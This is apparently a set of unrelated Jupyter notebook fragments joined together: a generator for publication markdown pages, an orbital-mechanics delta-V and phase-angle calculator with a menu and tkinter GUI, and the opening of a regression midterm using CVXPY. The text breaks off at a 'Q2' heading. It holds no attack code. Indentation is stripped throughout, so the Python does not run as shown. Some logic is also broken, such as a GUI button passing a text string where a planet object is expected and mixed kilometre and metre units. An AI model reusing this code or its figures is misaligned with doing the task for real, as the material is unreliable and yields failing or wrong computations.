This is where the heavy lifting is done. This loops through all the rows in the TSV dataframe, then starts to concatenate a big string (```md```) that contains the markdown for each type. It does the YAML metadata first, then does the description for the individual page.
```
import os
for row, item in publications.iterrows():
md_filename = str(item.pub_date) + "-" + item.url_slug + ".md"
html_filename = str(item.pub_date) + "-" + item.url_slug
year = item.pub_date[:4]
## YAML variables
md = "---\ntitle: \"" + item.title + '"\n'
md += """collection: publications"""
md += """\npermalink: /publication/""" + html_filename
if len(str(item.excerpt)) > 5:
md += "\nexcerpt: '" + html_escape(item.excerpt) + "'"
md += "\ndate: " + str(item.pub_date)
md += "\nvenue: '" + html_escape(item.venue) + "'"
if len(str(item.paper_url)) > 5:
md += "\npaperurl: '" + item.paper_url + "'"
md += "\ncitation: '" + html_escape(item.citation) + "'"
md += "\n---"
## Markdown description for individual page
if len(str(item.excerpt)) > 5:
md += "\n" + html_escape(item.excerpt) + "\n"
if len(str(item.paper_url)) > 5:
md += "\n[Download paper here](" + item.paper_url + ")\n"
md += item.citation
md_filename = os.path.basename(md_filename)
with open("../_publications/" + md_filename, 'w') as f:
f.write(md)
```
These files are written to the `_publications` directory, one level up from the folder we're working in.
```
!ls ../_publications/
!cat ../_publications/2009-10-01-paper-title-number-1.md
```
```
#!pip install jupyterthemes
#!jt -t chesterish
#!pip install autopep8
import numpy as np
import matplotlib.pyplot as plt
import tkinter as tk
class Planet():
def __init__(self, a, M, e, T, r, n, soi):
self.G = 6.67e-11
self.semimajor_axis = a
self.mass = M
self.eccentricity = e
self.period = T
self.radius = r
self.mu = self.mass * self.G
self.name = n
self.soi = soi
def format_response_dv(dV):
string_fin = str(dV) + ' ' + 'm/s'
return string_fin
#Earth = Planet(a = 149598023e3, M = 5.927e24, e = 0.0167086, T = 31558149.504, mu = 3.986e14)
#print('The semi-major axis of Earth is ' + str(Earth.semimajor_axis / 1000) + ' km')
#print('mu Earth is ' + str(Earth.mu) + ' m^3/s^2')
# All values given in MKS (SI units), as they should be, except the semi-major axis and SOI, which are in km
Mercury = Planet(a = 5.790934e7, M = 3.301e23, e = 0.206, T = 7600176, r = 4879000 / 2, n = 'Mercury', soi = 0.117e6)
Venus = Planet(a = 1.082041e8, M = 4.867e24, e = 0.007, T = 19394640, r = 12104000 / 2, n = 'Venus', soi = 0.616e6)
Earth = Planet(a = 1.496e8, M = 5.972e24, e = 0.017, T= 31558149.504, r = 12756000 / 2, n = 'Earth', soi = 0.929e6)
Mars = Planet(a = 2.27987e8, M = 6.417e23, e = 0.093, T = 5.9288e7, r = 6792000 / 2, n = 'Mars', soi = 0.578e6)
Jupiter = Planet(a = 7.783577e8, M = 1.899e27, e = 0.048, T = 3.7528e8, r = 142984000 / 2, n = 'Jupiter', soi = 48.2e6)
Saturn = Planet(a = 1.4331e9, M = 5.685e26, e = 0.056, T = 9.3031e8, r = 120536000 / 2, n = 'Saturn', soi = 54.5e6)
Uranus = Planet(a = 2.8723e9, M = 8.682e25, e = 0.046, T = 2.649e9, r = 51118000 / 2, n = 'Uranus', soi = 51.9e6)
Neptune = Planet(a = 4.496912e9, M = 1.024e26, e = 0.010, T = 5.19713e9, r = 49528000 / 2, n = 'Neptune', soi = 86.2e6)
Kerbin = Planet(a = 13599840256, M = 5.2915e22, e = 0, T = 9203545, r = 2370000 / 2, n = 'Kerbin', soi = 0)
type(Earth)
print(Earth.mu)
def deltaV_1(r1,r2, Planet):
"""Takes two positional arguments and returns a value for the delta-V for a supplied planet"""
mu = Planet.mu
#print(mu_Earth)
A = np.sqrt(mu / r1)
#print(A)
B = (np.sqrt((2 * r2) / (r1 + r2)) - 1)
#print(B)
dV1 = A*B
placehold = dV1
label['text'] = format_response_dv(placehold)
return dV1
def deltaV_2(r1,r2, Planet):
"""Takes two positional arguments and returns a value for the delta-V for a supplied planet"""
mu = Planet.mu
A = np.sqrt(mu / r2)
B = (1 - np.sqrt((2 * r1) / (r1 + r2)))
dV2 = A*B
return dV2
#The angle has to be converted to radians
def NormRad(v_i, theta):
"""Calculates the required delta-V for a normal/radial burn"""
#A = (v_i ** 2) + (v_f ** 2)
#B = - ((2 * v_i * v_f) * np.cos(theta))
#dV = np.sqrt(A * B)
#dV = np.sqrt((v_i ** 2 + v_f ** 2))
theta_over_two = np.radians(theta) / 2
dV = (2 * v_i) * (np.sin(theta_over_two))
placehold = dV
label['text'] = format_response_dv(placehold)
return np.round(dV)
def NormRad_TwoVel(v_i, v_f, theta):
"""Has the same use as the NormRad function, takes an additional argument for the instance where the final
velocity is different to the initial"""
#A = (v_i ** 2) + (v_f ** 2)
theta_rad = np.radians(theta)
#B = - ((2 * v_i * v_f) * np.cos(theta_rad))
dV = np.sqrt((v_i**2 + v_f**2) - (2 * v_i * v_f * np.cos(theta_rad)))
placehold = dV
label['text'] = format_response_dv(placehold)
return dV
#print(NormRad_TwoVel(7500, 7500, 8))
def NormRadPlot(v):
velocity = v
theta = np.linspace(0,360,1000)
theta_over_two = np.radians(theta) / 2
delta_V_normRad = (2 * velocity) * (np.sin(theta_over_two))
plt.plot(theta, delta_V_normRad)
plt.title('Delta V requirements for a Normal/Radial maneuver')
plt.ylabel('Delta V')
plt.xlabel('Angle (Degrees)')
plt.grid(True)
plt.show()
NormRadPlot(7000)
def NormRadPlot_TwoVel(v_i, v_f):
v_initial = v_i
v_final = v_f
theta = np.linspace(0,360,1000)
theta_rad = np.radians(theta)
dV_TwoVel = np.sqrt((v_initial**2 + v_final**2) - (2 * v_initial * v_final * np.cos(theta_rad)))
plt.plot(theta, dV_TwoVel)
plt.title('Delta V requirements for a Normal/Radial maneuver (with a different final velocity)')
plt.ylabel('Delta V')
plt.xlabel('Angle (Degrees)')
plt.grid(True)
plt.show()
NormRadPlot_TwoVel(7000, 20000)
def Orbital_Velocity(r, Planet):
"""Calculates the orbital veloctiy around a given planet using a supplied radius in metres"""
mu = Planet.mu
radius = Planet.radius + r
v = np.sqrt(mu / radius)
return v
def Orbital_Period(r, Planet):
"""Calculates the orbital period around a given planet using the supplied radius in metres"""
mu = Planet.mu
radius = Planet.radius + r
period = np.sqrt((4 * np.pi**2 * radius**3) / (mu)) #seconds
return period
#Intend to add if statement to break the function if the escape velocity is reached
def Orbital_Velocity_Plot(Planet):
mu = Planet.mu
radius = Planet.radius + np.linspace(1,10000000,10000)
v = np.sqrt(mu / radius)
plt.plot(v, radius)
plt.ylabel('radius (m)')
plt.xlabel('velocity (m/s)')
plt.title('Orbital velocity for a given body')
plt.grid(True)
def Orbital_Period_Plot(Planet):
mu = Planet.mu
radius = Planet.radius + np.linspace(10000,10000000,10000)
period = np.sqrt((4 * np.pi**2 * radius**3) / (mu)) #seconds
plt.plot(period, radius)
plt.ylabel('radius (m)')
plt.xlabel('period (s)')
plt.title('Orbital period for a given body')
plt.grid(True)
# angle_test = np.linspace(1,90,90)
# print(angle_test)
# for i in angle_test:
# vel = 2000
# d_v = np.sqrt((2 * (vel ** 2)) * (1 - np.cos(i)))
# matplotlib.pyplot.plot(angle_test, d_v)
# print(Jupiter.mass)
# print(deltaV_1(700000, 900000, Mars))
# print(deltaV_2(700000,900000, Mars))
def Planet_info(Planet):
print('The semi-major axis is ' + str(Planet.semimajor_axis / 1000) + ' km or ' + str(Planet.semimajor_axis / 1.496e11) + ' AU')
print('mu is ' + str(Planet.mu) + ' m^3/s^2')
print('The Mass is ' + str(Planet.mass) + ' kg')
print('The eccentricity is ' + str(Planet.eccentricity) + ' [Dimensionless]')
print('The orbital period is ' + str(Planet.period) + ' s or ' + str(Planet.period / (60 *60 * 24 * 365)) + ' years')
```
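As a quick sanity check of the circular-orbit formula used in `Orbital_Velocity`, here is a self-contained version with assumed Earth values (the `mu` and radius constants below are restated assumptions, not pulled from the `Planet` instances):

```python
import math

mu = 3.986e14                # Earth's GM in m^3/s^2 (assumed value)
earth_radius = 12756000 / 2  # equatorial radius in m, matching the Earth instance above
altitude = 400e3             # roughly the ISS's altitude in m

# Circular orbital speed: v = sqrt(mu / r)
v = math.sqrt(mu / (earth_radius + altitude))
print(round(v), 'm/s')  # about 7670 m/s, close to the ISS's actual orbital speed
```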
## Phase Angle and Delta-V calculator
### Phase Angle
$t_{h} = \pi \sqrt{\frac{(r_1 + r_2)^3}{8\mu}}$ $\rightarrow$ $\mu$ is the solar value in these cases $\\$
$\theta_{phase} = 180^{\circ} - \sqrt{\frac{\mu}{r_2}}\frac{t_h}{r_2}\frac{180}{\pi}$
### Velocity
$\Delta v_1 = \sqrt{\frac{\mu}{r_1}}(\sqrt{\frac{2 r_2}{r_1 + r_2}}-1)$ $\\$
$v_1 = \sqrt{\frac{r_1(r_2 \cdot v_2^{2} - 2 \mu) + 2 r_2 \cdot \mu}{r_1 \cdot r_2}}$ $\rightarrow$ $\mu$ here is the planetary value. Additionally, $v_2$ is the SOI exit velocity, which should be the same as the value of $\Delta v_1$. $r_2$ is the SOI radius whilst $r_1$ is the radius of the parking orbit.
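The $\Delta v_1$ expression can be sanity-checked numerically. The radii below are assumed example values for a low-Earth-orbit to geostationary transfer; they are not taken from the notebook:

```python
import math

mu = 3.986e14  # Earth's GM, m^3/s^2 (assumed)
r1 = 6.678e6   # ~300 km parking orbit radius, m
r2 = 4.2164e7  # geostationary orbit radius, m

# First Hohmann burn: dv1 = sqrt(mu/r1) * (sqrt(2*r2/(r1+r2)) - 1)
dv1 = math.sqrt(mu / r1) * (math.sqrt((2 * r2) / (r1 + r2)) - 1)
print(round(dv1), 'm/s')  # roughly 2430 m/s for the first burn
```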
### Transfer Burn Point
$\epsilon = \frac{v^2}{2} - \frac{\mu}{r}$ $\rightarrow$ $\mu$ again is for the origin planet
$\textbf{h} = \textbf{r} \times \textbf{v}$
$e = \sqrt{1 + \frac{2 \epsilon h^2}{\mu^2}}$
$\theta = \cos^{-1}(\frac{1}{e})$ $\rightarrow$ make sure this value is in degrees not radians
$\therefore$ Ejection Angle $= 180^{\circ} - \theta$
NB: positive values indicate the target planet starts out in front; negative values mean the target planet starts out behind.
```
GM_sun = 1.32712440018e11
#a = (149e6 + 227e6) / 2
print(Earth.semimajor_axis)
a = ((Earth.semimajor_axis) + (Mars.semimajor_axis)) / 2
print(a)
p = np.sqrt((4 * (3.142 ** 2) * (a ** 3)) / GM_sun)
#t_h = np.pi * np.sqrt(((149597887000 + 227000000000)**3) / 8 * GM_sun)
print((str((p / (60 * 60 * 24 * 30)) / 2)) + ' months')
```
```
def Phase_Angle(Planet1, Planet2):
"""Calculates the phase angle (in degrees), this is the angle from one planet to another with the sun at
the vertex and is essential for timing interplanetary missions"""
GM_sun = 1.327e11
#print(Planet1.semimajor_axis)
#t_h = np.pi * np.sqrt(((Planet1.semimajor_axis + Planet2.semimajor_axis)**3) / 8 * GM_sun)
a = ((Planet1.semimajor_axis) + (Planet2.semimajor_axis)) / 2
t_h = (np.sqrt((4 * (3.142 ** 2) * (a ** 3)) / GM_sun)) / 2
#print(t_h)
print("The Hohmann transfer time from " + str(Planet1.name) + " to " + str(Planet2.name) + " is "
+ str(np.round((t_h / (60 * 60 * 24 * 30)), decimals=2)) + " months, or "
+ str(np.round((t_h / (60 * 60 * 24)), decimals=0)) + " days")
    phase_angle = 180 - (np.sqrt(GM_sun / Planet2.semimajor_axis) * (t_h / Planet2.semimajor_axis) * (180/np.pi))
deg_per_day = 360 / (Planet2.period / (60 * 60 * 24))
print(str(np.round(deg_per_day, decimals=2)) + " degrees per day")
phase_angle2 = 180 - (deg_per_day * (t_h / (60 * 60 * 24)))
return phase_angle2
#return phase_angle
def Delta_v_transfer(Planet1, Planet2): #This is v2
GM_sun = 1.327e11
delta_v_transfer = np.sqrt(GM_sun / Planet1.semimajor_axis) \
* ((np.sqrt((2 * Planet2.semimajor_axis) / (Planet1.semimajor_axis + Planet2.semimajor_axis))) - 1)
return delta_v_transfer
def Ejection_Velocity(Planet1, Planet2, r): #This uses v2 to get v
r = (r * 1000) + Planet1.radius #Parking orbit radius (planetary radius + orbital altitude)
excess_v = Delta_v_transfer(Planet1, Planet2) * 1000 #Convert to meters for next calculation
#print(str(excess_v) + ' is the excess velocity')
    eject_v = np.sqrt((r * ((Planet1.soi * (excess_v ** 2)) - (2 * Planet1.mu)) + (2 * Planet1.soi * Planet1.mu)) \
                      / (r * Planet1.soi))
#print(eject_v)
return eject_v / 1000 #Convert back to km
def Delta_v(Planet1, Planet2, r):
"""Input origin body/planet, destination body/planet and the altitude of your parking orbit
in kilometers and return a value for your delta-V requirements"""
v = Ejection_Velocity(Planet1, Planet2, r)
#print(v)
#dv1 = Delta_v_transfer(Planet1, Planet2)
#print(dv1)
radius = (r * 1000) + Planet1.radius #Take orbital radius given in km and convert to meters for calculation
v0 = np.sqrt((Planet1.mu) / radius) / 1000 #Convert to km/s
#print(v0)
delta_v = v - v0
print(str(np.round(delta_v, decimals = 2)) + \
" km/s <- This value is the actual delta V required to get from " + str(Planet1.name) + " to " + str(Planet2.name) + " from a parking orbit of " + str(r) + " km")
return delta_v
Delta_v(Earth, Mars, 100)
Delta_v.__doc__
def Ejection_Angle(Planet1, Planet2, r):
v = Ejection_Velocity(Planet1, Planet2, r) * 1000 #Convert to meters
radius = (r * 1000) + Planet1.radius
    eta = ((v ** 2) / 2) - (Planet1.mu / radius) # specific orbital energy, matching the formula above
    h = radius * v # specific angular momentum; use the orbital radius in metres
e = np.sqrt(1 + ((2 * eta * (h ** 2)) / (Planet1.mu ** 2)))
theta = np.arccos(1 / e)
return 'The ejection angle required is ' + str(np.round(180 - np.degrees(theta))) + ' degrees'
Ejection_Angle(Earth, Mars, 100)
```
```
#####
while True:
print('1. Calculate delta V for a Hohmann transfer')
    print('2. Calculate delta V for a normal or radial burn (Constant velocity)')
    print('3. Calculate delta V for a normal or radial burn (different final velocity)')
print('4. Display planetary data')
print('5. Create custom planet')
print('6. Exit programme')
choice = int(input('Select what you would like to do '))
if (choice == 1):
print('1. Mercury')
print('2. Venus')
print('3. Earth')
print('4. Mars')
print('5. Jupiter')
print('6. Saturn')
print('7. Uranus')
print('8. Neptune')
        planet = int(input('Which planet are you maneuvering around? '))
if (planet == 1):
print('Please enter your r1 and r2 for Mercury in metres for the first burn')
r1_Mercury = int(input('r1 = '))
r2_Mercury = int(input('r2 = '))
print(str(deltaV_1(r1_Mercury, r2_Mercury, Mercury)) + ' m/s')
print('Please enter your r1 and r2 for Mercury in metres for the second burn')
r1_Mercury_2 = int(input('r1 = '))
r2_Mercury_2 = int(input('r2 = '))
print(str(deltaV_2(r1_Mercury_2, r2_Mercury_2, Mercury)) + ' m/s')
            print('Total delta V = ' + str(deltaV_1(r1_Mercury, r2_Mercury, Mercury) + deltaV_2(r1_Mercury_2, r2_Mercury_2, Mercury)) + ' m/s')
elif (planet == 2):
print('Please enter your r1 and r2 for Venus in metres for the first burn')
r1_Venus = int(input('r1 = '))
r2_Venus = int(input('r2 = '))
print(str(deltaV_1(r1_Venus, r2_Venus, Venus)) + ' m/s')
print('Please enter your r1 and r2 for Venus in metres for the second burn')
r1_Venus_2 = int(input('r1 = '))
r2_Venus_2 = int(input('r2 = '))
print(str(deltaV_2(r1_Venus_2, r2_Venus_2, Venus)) + ' m/s')
            print('Total delta V = ' + str(deltaV_1(r1_Venus, r2_Venus, Venus) + deltaV_2(r1_Venus_2, r2_Venus_2, Venus)) + ' m/s')
elif (planet == 3):
print('Please enter your r1 and r2 for Earth in metres for the first burn')
r1_Earth = int(input('r1 = '))
r2_Earth = int(input('r2 = '))
print(str(deltaV_1(r1_Earth, r2_Earth, Earth)) + ' m/s')
print('Please enter your r1 and r2 for Earth in metres for the second burn')
r1_Earth_2 = int(input('r1 = '))
r2_Earth_2 = int(input('r2 = '))
print(str(deltaV_2(r1_Earth_2, r2_Earth_2, Earth)) + ' m/s')
            print('Total delta V = ' + str(deltaV_1(r1_Earth, r2_Earth, Earth) + deltaV_2(r1_Earth_2, r2_Earth_2, Earth)) + ' m/s')
elif (planet == 4):
print('Please enter your r1 and r2 for Mars in metres for the first burn')
r1_Mars = int(input('r1 = '))
r2_Mars = int(input('r2 = '))
print(str(deltaV_1(r1_Mars, r2_Mars, Mars)) + ' m/s')
print('Please enter your r1 and r2 for Mars in metres for the second burn')
r1_Mars_2 = int(input('r1 = '))
r2_Mars_2 = int(input('r2 = '))
print(str(deltaV_2(r1_Mars_2, r2_Mars_2, Mars)) + ' m/s')
            print('Total delta V = ' + str(deltaV_1(r1_Mars, r2_Mars, Mars) + deltaV_2(r1_Mars_2, r2_Mars_2, Mars)) + ' m/s')
elif (planet == 5):
print('Please enter your r1 and r2 for Jupiter in metres for the first burn')
r1_Jupiter = int(input('r1 = '))
r2_Jupiter = int(input('r2 = '))
print(str(deltaV_1(r1_Jupiter, r2_Jupiter, Jupiter)) + ' m/s')
print('Please enter your r1 and r2 for Jupiter in metres for the second burn')
r1_Jupiter_2 = int(input('r1 = '))
r2_Jupiter_2 = int(input('r2 = '))
print(str(deltaV_2(r1_Jupiter_2, r2_Jupiter_2, Jupiter)) + ' m/s')
            print('Total delta V = ' + str(deltaV_1(r1_Jupiter, r2_Jupiter, Jupiter) + deltaV_2(r1_Jupiter_2, r2_Jupiter_2, Jupiter)) + ' m/s')
elif (choice == 2):
print('1. Mercury')
print('2. Venus')
print('3. Earth')
print('4. Mars')
print('5. Jupiter')
print('6. Saturn')
print('7. Uranus')
print('8. Neptune')
planet_normrad = int(input('Which planet are you performing a normal or radial burn around? (Assuming velocity is supposed to be maintained)'))
        angle = int(input('What is the angle you wish to change by? (In degrees) '))
velocity_initial = int(input('The initial velocity (m/s) = '))
# velocity_final = int(input('The final velocity (m/s) = '))
if (planet_normrad == 1):
print(str(NormRad(velocity_initial, angle)) + ' m/s')
elif (planet_normrad == 2):
print(str(NormRad(velocity_initial, angle)) + ' m/s')
elif (planet_normrad == 3):
print(str(NormRad(velocity_initial, angle)) + ' m/s')
elif (planet_normrad == 4):
print(str(NormRad(velocity_initial, angle)) + ' m/s')
elif (planet_normrad == 5):
print(str(NormRad(velocity_initial, angle)) + ' m/s')
elif (planet_normrad == 6):
print(str(NormRad(velocity_initial, angle,)) + ' m/s')
elif (planet_normrad == 7):
print(str(NormRad(velocity_initial, angle)) + ' m/s')
else:
print(str(NormRad(velocity_initial, angle)) + ' m/s')
elif (choice == 3):
print('1. Mercury')
print('2. Venus')
print('3. Earth')
print('4. Mars')
print('5. Jupiter')
print('6. Saturn')
print('7. Uranus')
print('8. Neptune')
        planet_normrad = int(input('Which planet are you performing a normal or radial burn around? '))
        angle = int(input('What is the angle you wish to change by? (In degrees) '))
velocity_initial = int(input('The initial velocity (m/s) = '))
velocity_final = int(input('The final velocity (m/s) = '))
if (planet_normrad == 1):
print(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')
elif (planet_normrad == 2):
print(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')
elif (planet_normrad == 3):
print(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')
elif (planet_normrad == 4):
print(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')
elif (planet_normrad == 5):
print(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')
elif (planet_normrad == 6):
print(str(NormRad_TwoVel(velocity_initial, velocity_final, angle,)) + ' m/s')
elif (planet_normrad == 7):
print(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')
else:
print(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')
elif (choice == 4):
print('1. Mercury')
print('2. Venus')
print('3. Earth')
print('4. Mars')
print('5. Jupiter')
print('6. Saturn')
print('7. Uranus')
print('8. Neptune')
print('9. Custom planet')
planet_info = int(input('Which planets information would you like?'))
if (planet_info == 1):
print(Planet_info(Mercury))
elif(planet_info == 2):
print(Planet_info(Venus))
elif(planet_info == 3):
print(Planet_info(Earth))
elif(planet_info == 4):
print(Planet_info(Mars))
elif(planet_info == 5):
print(Planet_info(Jupiter))
elif(planet_info == 6):
print(Planet_info(Saturn))
elif(planet_info == 7):
print(Planet_info(Uranus))
elif(planet_info == 8):
print(Planet_info(Neptune))
elif(planet_info == 9):
try:
print(Planet_info(custom_planet))
except NameError:
print('Custom planet data not found, please create a custom planet and then try again')
else:
print('Incorrect option. Please try again')
elif (choice == 5):
        name = str(input('What is the name of your custom planet? '))
        semi_major = float(input('What is ' + str(name) + 's semi-major axis? [m] '))
        mass = float(input('What is the mass of ' + str(name) + '? [kg] '))
        eccen = float(input('What is ' + str(name) + 's eccentricity? [Dimensionless] '))
        period = float(input('What is ' + str(name) + 's orbital period? [s] '))
        rad = float(input('What is the radius of ' + str(name) + '? [m] '))
        custom_planet = Planet(semi_major, mass, eccen, period, rad, name, 0) # Planet also needs a name and SOI; SOI set to 0 here like Kerbin
print(Planet_info(custom_planet))
elif (choice == 6):
exit()
else:
print('Incorrect choice, please select a valid number')
```
```
root = tk.Tk()
#root = tk.Toplevel()
root.state('zoomed')
root.iconbitmap('rocket_icon.ico')
root.title('Orbital Mechanics Calculator')
HEIGHT = 700
WIDTH = 1000
canvas = tk.Canvas(root, height=HEIGHT, width=WIDTH)
canvas.pack()
#background_image = tk.PhotoImage(file='cosmos-5809271_1920.png')
background_image = tk.PhotoImage(file='rocket_background_collaged.png')
background_label = tk.Label(root, image=background_image)
background_label.place(relwidth=1, relheight=1)
frame = tk.Frame(root, bg='#00688B', bd=5)
#frame = tk.Frame(root, bg='#80c1ff', bd=5)
frame.place(relx=0.5, rely=0.1, relwidth=0.75, relheight=0.3, anchor='n')
tk.Label(frame, text = "r1:").place(relwidth=0.03, relheight=0.15)
tk.Label(frame, text = "r2:").place(relx=0.21, relwidth=0.03, relheight=0.15)
tk.Label(frame, text = "Planet:").place(relx=0.41, relwidth=0.03, relheight=0.15)
tk.Label(frame, text = "velocity:").place(relwidth=0.03, relheight=0.15, rely=0.25)
tk.Label(frame, text = "theta:").place(relx=0.21, relwidth=0.03, relheight=0.15, rely=0.25)
entry_r1_1 = tk.Entry(frame, font=40, text='r1')
entry_r1_1.place(relwidth=0.15, relx=0.05, rely=0, relheight=0.15)
entry_r2_1 = tk.Entry(frame, font=40, text='r2')
entry_r2_1.place(relwidth=0.15, relx=0.25, rely=0, relheight=0.15)
entry_planet_1 = tk.Entry(frame, font=40, text='Planet')
entry_planet_1.place(relwidth=0.15, relx=0.45, rely=0, relheight=0.15)
entry_vi = tk.Entry(frame, font=40, text='initial velocity')
entry_vi.place(relwidth=0.15, relx=0.05, rely=0.25, relheight=0.15)
entry_theta_1 = tk.Entry(frame, font=40)
entry_theta_1.place(relwidth=0.15, rely=0.25, relx =0.25, relheight=0.15)
entry_vi_2 = tk.Entry(frame, font=40)
entry_vi_2.place(relwidth=0.15, rely=0.5, relx=0.05, relheight=0.15)
entry_vf = tk.Entry(frame, font=40)
entry_vf.place(relwidth=0.15, rely=0.5, relx=0.25, relheight=0.15)
entry_theta = tk.Entry(frame, font=40)
entry_theta.place(relwidth=0.15, rely=0.5, relx =0.45, relheight=0.15)
#entry_
#button_hohmann_1 = tk.Button(frame, text="Hohmann Transfer Delta-V", font=40, command=lambda: deltaV_1(float(entry_r1_1.get()), float(entry_r2_1.get()),Earth))
button_hohmann_1 = tk.Button(frame, text="Hohmann Transfer Delta-V", font=40, command=lambda: deltaV_1(float(entry_r1_1.get()), float(entry_r2_1.get()),entry_planet_1.get()))
button_hohmann_1.place(relx=0.7, rely=0, relheight=0.15, relwidth=0.3)
button_normrad = tk.Button(frame, text="Normal/Radial Delta-V", font=40, command=lambda: NormRad(float(entry_vi.get()), float(entry_theta_1.get())))
button_normrad.place(relx=0.7, rely=0.25, relheight=0.15, relwidth=0.3)
button_normrad_diffV = tk.Button(frame, text="Normal/Radial Delta-V (Different velocities)", font=40, command=lambda: NormRad_TwoVel(float(entry_vi_2.get()),float(entry_vf.get()),float(entry_theta.get())))
button_normrad_diffV.place(relx=0.7, rely=0.5, relheight=0.15, relwidth=0.3)
lower_frame = tk.Frame(root, bg='#00688B', bd=10)
lower_frame.place(relx=0.5, rely=0.65, relwidth=0.25, relheight=0.2, anchor='n')
label = tk.Label(lower_frame)
label.place(relwidth=1, relheight=1)
root.mainloop()
```
<h1>CI Midterm<span class="tocSkip"></span></h1>
<div class="toc"><ul class="toc-item"><li><span><a href="#Q1-Simple-Linear-Regression" data-toc-modified-id="Q1-Simple-Linear-Regression-1">Q1 Simple Linear Regression</a></span></li><li><span><a href="#Q2-Fuzzy-Linear-Regression" data-toc-modified-id="Q2-Fuzzy-Linear-Regression-2">Q2 Fuzzy Linear Regression</a></span></li><li><span><a href="#Q3-Support-Vector-Regression" data-toc-modified-id="Q3-Support-Vector-Regression-3">Q3 Support Vector Regression</a></span></li><li><span><a href="#Q4-Single-layer-NN" data-toc-modified-id="Q4-Single-layer-NN-4">Q4 Single-layer NN</a></span><ul class="toc-item"><li><span><a href="#First-two-iterations-illustration" data-toc-modified-id="First-two-iterations-illustration-4.1">First two iterations illustration</a></span></li><li><span><a href="#Code" data-toc-modified-id="Code-4.2">Code</a></span></li></ul></li><li><span><a href="#Q5-Two-layer-NN" data-toc-modified-id="Q5-Two-layer-NN-5">Q5 Two-layer NN</a></span><ul class="toc-item"><li><span><a href="#First-two-iterations-illustration" data-toc-modified-id="First-two-iterations-illustration-5.1">First two iterations illustration</a></span></li><li><span><a href="#Code" data-toc-modified-id="Code-5.2">Code</a></span></li></ul></li><li><span><a href="#Q6-Re-do-Q1-Q5" data-toc-modified-id="Q6-Re-do-Q1-Q5-6">Q6 Re-do Q1-Q5</a></span><ul class="toc-item"><li><span><a href="#Simple-Linear-Regression" data-toc-modified-id="Simple-Linear-Regression-6.1">Simple Linear Regression</a></span></li><li><span><a href="#Fuzzy-Linear-Regression" data-toc-modified-id="Fuzzy-Linear-Regression-6.2">Fuzzy Linear Regression</a></span></li><li><span><a href="#Support-Vector-Regression" data-toc-modified-id="Support-Vector-Regression-6.3">Support Vector Regression</a></span></li><li><span><a href="#Single-layer-NN" data-toc-modified-id="Single-layer-NN-6.4">Single-layer NN</a></span><ul class="toc-item"><li><span><a href="#First-two-iterations-illustration" 
data-toc-modified-id="First-two-iterations-illustration-6.4.1">First two iterations illustration</a></span></li><li><span><a href="#Code" data-toc-modified-id="Code-6.4.2">Code</a></span></li></ul></li><li><span><a href="#Two-layer-NN" data-toc-modified-id="Two-layer-NN-6.5">Two-layer NN</a></span><ul class="toc-item"><li><span><a href="#First-two-iterations-illustration" data-toc-modified-id="First-two-iterations-illustration-6.5.1">First two iterations illustration</a></span></li><li><span><a href="#Code" data-toc-modified-id="Code-6.5.2">Code</a></span></li></ul></li></ul></li><li><span><a href="#Q7-Discussion" data-toc-modified-id="Q7-Discussion-7">Q7 Discussion</a></span><ul class="toc-item"><li><span><a href="#Discussion-of-Convergence-Issue" data-toc-modified-id="Discussion-of-Convergence-Issue-7.1">Discussion of Convergence Issue</a></span></li></ul></li><li><span><a href="#Q8-Bonus-Question" data-toc-modified-id="Q8-Bonus-Question-8">Q8 Bonus Question</a></span><ul class="toc-item"><li><span><a href="#Simple-Linear-Regression" data-toc-modified-id="Simple-Linear-Regression-8.1">Simple Linear Regression</a></span></li><li><span><a href="#Fuzzy-Linear-Regression" data-toc-modified-id="Fuzzy-Linear-Regression-8.2">Fuzzy Linear Regression</a></span></li><li><span><a href="#Support-Vector-Regression" data-toc-modified-id="Support-Vector-Regression-8.3">Support Vector Regression</a></span></li><li><span><a href="#Single-layer-NN" data-toc-modified-id="Single-layer-NN-8.4">Single-layer NN</a></span></li></ul></li></ul></div>
## Q1 Simple Linear Regression
First, the training data has been visualized as below.
```
%matplotlib inline
import numpy as np
import pandas as pd
import cvxpy as cp
import matplotlib.pyplot as plt
ar = np.array([[1, 1, 1, 1, 1, 1], # intercept
[1, 2, 3, 4, 5, 6], # x
[1, 2, 3, 4, 5, 6]]) # y
# plot the dot points
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.title('Visualization of training observations')
plt.axis('scaled')
plt.show()
```
The data has been processed and the optimization problem (least sum of squares) has been formulated. The estimate of $a$ (the slope) is very close to 1 and $b$ (the intercept) is very close to 0. The fitted line has been plotted over the training data as well.
```
# Data preprocessing
X_lp = ar[[0, 1], :].T # transpose the array before modeling
y_lp = ar[2].T
# Define and solve the CVXPY problem.
beta = cp.Variable(X_lp.shape[1]) # return num of cols, 2 in total
cost = cp.sum_squares(X_lp * beta - y_lp) # define cost function
obj = cp.Minimize(cost) # define objective function
prob = cp.Problem(obj)
prob.solve(solver=cp.CPLEX, verbose=False)
# print("status:", prob.status)
print("\nThe optimal value of loss is:", prob.value)
print("\nThe estimate of a (slope) is:", beta.value[1],
      "\nThe estimate of b (intercept) is:", beta.value[0])
x = np.linspace(0, 10, 100)
y = beta.value[1] * x + beta.value[0]
plt.close('all')
plt.plot(x, y, c='red', label='y = ax + b')
plt.title('Fitted line using simple LR')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.axis('scaled')
plt.show()
```
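Since the CVXPY/CPLEX stack may not be available everywhere, the same estimate can be cross-checked against the closed-form least-squares solution. This is a minimal sketch (assuming only NumPy) that rebuilds the design matrix used above:

```python
import numpy as np

# Rebuild the design matrix (intercept column + x) and the targets from the data above
X = np.column_stack([np.ones(6), np.arange(1.0, 7.0)])
y = np.arange(1.0, 7.0)

# Ordinary least squares via numpy.linalg.lstsq (solves min ||X beta - y||^2)
beta, residuals, rank, sv = np.linalg.lstsq(X, y, rcond=None)
print("intercept b =", beta[0], ", slope a =", beta[1])
```

As expected, the slope comes out as 1 and the intercept as 0 (up to floating-point noise), matching the CVXPY result.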
## Q2 Fuzzy Linear Regression
